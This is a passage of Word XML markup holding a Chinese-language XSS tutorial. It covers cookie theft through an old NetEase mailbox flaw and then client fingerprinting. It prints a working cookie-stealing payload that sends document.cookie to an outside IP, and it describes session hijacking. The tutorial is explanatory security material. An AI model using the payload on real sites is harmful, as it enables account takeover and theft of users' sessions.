                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId262" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1160145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>7</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击盗取用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>信息</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3206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击盗取用户</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>信息一直是</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击漏洞利用的最主流方式之一。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>当用户正常登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用程序时，用户会从服务端得到一个包含有会话令牌的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> SessionID=6010D6F2F7B24A182EC3DF53E65C88FCA17B0A96FAE129C3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>黑客则可以通过</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跨站脚本攻击的方式将嵌入恶意代码的页面发送给用户，当用户点击浏览时，黑客即可获取用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息并用该信息欺骗服务器端，无需账号密码即可直接成功登录。这里我们以网易邮箱的</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跨站脚本攻击漏洞为例进行分析和描述。网易邮箱老版本中，曾经存在一个</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跨站脚本攻击漏洞，黑客可以构造如下代码：</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&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:xx=new Image();xx.src='http://61.130.75.239/pic/163.asp?url='+escape(document.URL)+'&amp;cookie='+escape(document.cookie);" width=0 height=0&gt;]]&gt;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 &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="2456815"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="49" name="图片 12" descr="http://up.2cto.com/2012/1223/201212231224203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up.2cto.com/2012/1223/20121223122420367.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2456815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>8</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并将包含有如图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示恶意代码的邮件发送至网易邮箱用户时，用户打开了含有恶意代码的邮件后，代码就会自动将用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>信息发送到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>61.130.75.239</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>163.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>文件，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>163.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的作用是记录发送过来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，记录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>内容如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="628015"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="图片 13" descr="http://up.2cto.com/2012/1223/201212231224202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up.2cto.com/2012/1223/20121223122420284.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId264" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="628015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>9</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在接收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>以后，就可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>欺骗的方式实现登录目标邮箱了，如图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="1542415"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="图片 14" descr="http://up.2cto.com/2012/1223/201212231224207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up.2cto.com/2012/1223/20121223122420700.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId265" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1542415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>10</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击搜集客户端环境信息</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lastRenderedPageBreak/>
        <w:t>搜集客户端环境信息在更多的时候主要应用于指定目标的渗透攻击或网络挂马攻击，如了解客户端环境所使用的浏览器信息、操作系统信息、组件是否安装以及安全防护软件安装情况等。通过</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跨站脚本攻击可以更加方便、快速地实现客户端环境信息的收集。</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那么如何通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>收集以上信息呢？我们构造如下脚本代码，并在浏览器中执行这段代码。</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&lt;script&gt; www.2cto.com</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alert(navigator.userAgent);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&lt;/script&gt;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得到的结果如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
